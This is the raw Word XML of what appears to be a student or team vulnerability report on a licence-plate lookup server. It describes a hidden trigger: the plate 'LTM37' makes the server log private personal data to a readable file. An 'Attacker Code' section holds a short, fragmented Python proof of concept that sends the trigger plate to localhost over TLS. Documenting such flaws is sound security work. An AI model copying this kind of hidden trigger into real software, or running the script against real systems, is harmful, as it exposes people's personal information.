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D1" w:rsidRDefault="002C6DBA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DB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Summary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>An attacker can access the Logging file and reveal sensitive information to its users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:num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PoC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Trigger point</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>matching special plate number(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t>TM37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0D45D1" w:rsidRDefault="000D45D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The client Sends a plate number to the lookup server. And Lookup server check plate number. If the plate number is” LTM37”, It starts logging the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rivate personal information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6DBA" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logging </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">text file is located </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>plateServer/x64/release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6DBA" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C6DBA" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E0564C" wp14:editId="6A9DBA7C">
            <wp:extent cx="5733415" cy="2545715"/>
            <wp:effectExtent l="0" t="0" r="63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BA" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>lookup server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6DBA" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="084677F4" wp14:editId="2CD77C38">
            <wp:extent cx="5733415" cy="1835785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BA" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>logging text file</w:t>
      </w:r>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C6DBA" w:rsidRDefault="002C6DBA" w:rsidP="002C6DBA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1"/>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DBA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1"/>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="002C6DB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Attacker Code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1"/>
    <w:p w:rsidR="002C6DBA" w:rsidRPr="002C6DBA" w:rsidRDefault="002C6DBA" w:rsidP="002C6D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굴림체" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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import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socket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ssl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import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time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import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threading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,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signal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import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sys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HOST = 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localhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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PORT = 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2222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context =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ssl.SSLContext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ssl.PROTOCOL_TLS_CLIENT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context.load_verify_locations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'rootca.crt'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context.load_verify_locations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('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serverCrt.pem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')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context.check_hostname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 =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>False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pn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 = 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"LTM37"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sn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 = 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"LKY1360"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C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC66D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getHtml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():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with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socket.socket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socket.AF_INET</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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socket.SOCK_STREAM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)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as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sock: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 xml:space="preserve">#with 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context.wrap_socket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 xml:space="preserve">(sock, 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server_hostname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='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pylib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') as s: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with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context.wrap_socket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(sock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C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>server_hostname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=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'2Team'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)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as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s.connect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((HOST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,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PORT))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>while True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1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sendMsgHdr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2C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체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pn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)+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1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sendMsgHdr2=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sendMsgHdr.to_bytes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2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, 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'big'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s.sendall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(sendMsgHdr2)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#print('Data : {} , Data Length : {}'.format(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pn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, sendMsgHdr2))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s.sendall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pn.encode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'utf-8'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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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sendMsgHdr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2C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체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sn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)+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1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sendMsgHdr2=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sendMsgHdr.to_bytes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2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, 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'big'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s.sendall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(sendMsgHdr2)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#print('Data : {} , Data Length : {}'.format(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pn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, sendMsgHdr2))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s.sendall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sn.encode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6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'utf-8'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n_threads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 = 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1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# Splitting the items into chunks equal to number of threads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thread_list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 = []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>try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in </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="8888C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>range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n_threads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time.sleep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6897BB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1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thread =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threading.Thread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r w:rsidRPr="002C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target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getHtml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thread_list.append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(thread)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thread_list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].start()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for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 xml:space="preserve">thread </w:t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thread_list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thread.join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()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</w:r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except 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8888C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KeyboardInterrupt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체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C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="8888C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SystemExit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):</w:t>
      </w:r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pid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 xml:space="preserve"> = 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os.getpid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()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  <w:t xml:space="preserve">    #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os.kill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pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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t>, 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체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sys.exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C6DBA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="굴림체" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D45D1" w:rsidRDefault="000D45D1" w:rsidP="002C6DBA"/>
    <w:sectPr w:rsidR="000D45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2E0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D174DD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D1"/>
    <w:rsid w:val="000D45D1"/>
    <w:rsid w:val="002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CFAAC-B1AD-48D2-A30C-0E4EEC3B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2C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C6DBA"/>
    <w:rPr>
      <w:rFonts w:ascii="굴림체" w:eastAsia="굴림체" w:hAnsi="굴림체" w:cs="굴림체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김현민/선임연구원/미래기술센터 C&amp;M표준(연)6G초고속전송솔루션Task(hyunmin02.kim@lge.com)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-04T09:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-04T09:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>